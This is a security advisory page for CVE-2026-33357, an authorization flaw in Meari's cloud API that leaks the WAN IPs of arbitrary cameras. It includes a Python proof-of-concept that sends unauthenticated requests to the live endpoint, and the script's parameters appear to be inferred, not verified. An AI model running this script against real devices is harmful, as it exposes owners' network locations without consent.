Security Vulnerability Report
CVE-2026-33357 CVSS 7.5 HIGH

CVE-2026-33357

Published: 2026-05-11 17:16:31
Last Modified: 2026-05-11 17:16:31
Source: 44488dab-36db-4358-99f9-bc116477f914

Description

In Meari client applications embedding "com.meari.sdk" (including CloudEdge 5.5.0 build 220, Arenti 1.8.1 build 220, and related white-label <= 1.8.x), the integrated call path to openapi-euce.mearicloud.com can be abused to retrieve WAN IP data for arbitrary devices. The root cause is a server-side authorization failure in "GET /openapi/device/status".

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CloudEdge 5.5.0 build 220
Arenti 1.8.1 build 220
Related Meari SDK white-label versions <= 1.8.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target endpoint based on the vulnerability description
target_url = "https://openapi-euce.mearicloud.com/openapi/device/status"

# Headers to mimic a legitimate client request if necessary (though auth is not required)
headers = {
    "User-Agent": "Meari-Scanner/1.0",
    "Accept": "application/json"
}

# Parameters to request status of an arbitrary device
# In a real attack, the attacker would iterate or guess device IDs
params = {
    "deviceId": "TARGET_DEVICE_ID_HERE"  # Replace with the target device ID
}

try:
    # Sending the GET request without authentication
    response = requests.get(target_url, headers=headers, params=params, timeout=10)

    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Device Status Data:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

Weakness

CWE-862 (Missing Authorization)

References

https://github.com/xn0tsa/nobody-puts-baby-in-a-corner
https://www.runzero.com/advisories/meari-openapi-device-status-idor-cve-2026-33357/